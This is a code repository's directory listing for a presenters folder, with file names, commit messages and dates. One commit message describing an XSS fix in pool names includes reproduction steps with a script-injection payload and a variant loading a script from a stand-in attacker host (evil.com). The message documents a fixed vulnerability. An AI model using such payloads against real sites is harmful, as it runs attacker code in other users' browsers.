evazion 22c624c356 Fix XSS in pool names in /pools/gallery page. ...

1) Set a pool name to '<script>alert("xss")</script>'.
2) Wait for people to view it in /pools/gallery.

At first glance the fact that the pool name is truncated to 80 chars
appears to limit how much can be done in the exploit. This poses no
problem though, since someone could inject '<script src="http://www.evil.com/evil.js"></script>' instead.

2014-10-17 13:10:54 -05:00

..

post_set_presenters

Revert "make pool gallery the default view"

2014-09-05 22:26:47 -07:00

forum_topic_presenter.rb

Kill trailing whitespace in ruby files

2013-03-19 23:10:10 +11:00

intro_presenter.rb

* Refactor user settings page

2013-07-09 17:47:29 -07:00

note_presenter.rb

Kill trailing whitespace in ruby files

2013-03-19 23:10:10 +11:00

post_presenter.rb

Fix XSS in pool names in /pools/gallery page.

2014-10-17 13:10:54 -05:00

post_version_presenter.rb

Kill trailing whitespace in ruby files

2013-03-19 23:10:10 +11:00

presenter.rb

Kill trailing whitespace in ruby files

2013-03-19 23:10:10 +11:00

tag_set_presenter.rb

show precision in tag list for posts btw 1k and 10k count

2014-02-11 16:32:40 -08:00

upload_presenter.rb

Kill trailing whitespace in ruby files

2013-03-19 23:10:10 +11:00

user_presenter.rb

Fix Rails 4.1 migration issues

2014-04-24 17:01:03 -07:00

wiki_page_presenter.rb

#1857 Display processing alias/implications on wikis

2014-06-21 20:02:02 -04:00